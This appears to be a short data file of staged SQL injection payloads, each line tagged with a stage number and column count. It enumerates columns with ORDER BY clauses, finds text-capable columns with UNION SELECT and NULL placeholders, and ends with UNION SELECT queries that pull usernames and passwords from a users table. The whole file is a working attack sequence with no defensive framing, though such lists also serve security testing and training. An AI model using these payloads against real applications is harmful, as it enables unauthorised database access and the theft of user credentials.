1;1;' ORDER BY 1-- 
1;2;' ORDER BY 2-- 
1;3;' ORDER BY 3-- 
1;4;' ORDER BY 4-- 
1;5;' ORDER BY 5-- 
2;2;' UNION SELECT 'a',NULL-- 
2;2;' UNION SELECT NULL,'a'-- 
2;3;' UNION SELECT 'a',NULL,NULL-- 
2;3;' UNION SELECT NULL,'a',NULL-- 
2;3;' UNION SELECT NULL,NULL,'a'-- 
2;4;' UNION SELECT 'a',NULL,NULL,NULL-- 
2;4;' UNION SELECT NULL,'a',NULL,NULL-- 
2;4;' UNION SELECT NULL,NULL,'a',NULL-- 
2;4;' UNION SELECT NULL,NULL,NULL,'a'-- 
3;2;' UNION SELECT username, password FROM users-- 
3;2;' UNION SELECT username, password FROM users-- 
3;3;' UNION SELECT username, password, last_name FROM users-- 
3;4;' UNION SELECT username, password, first_name, last_name FROM users-- 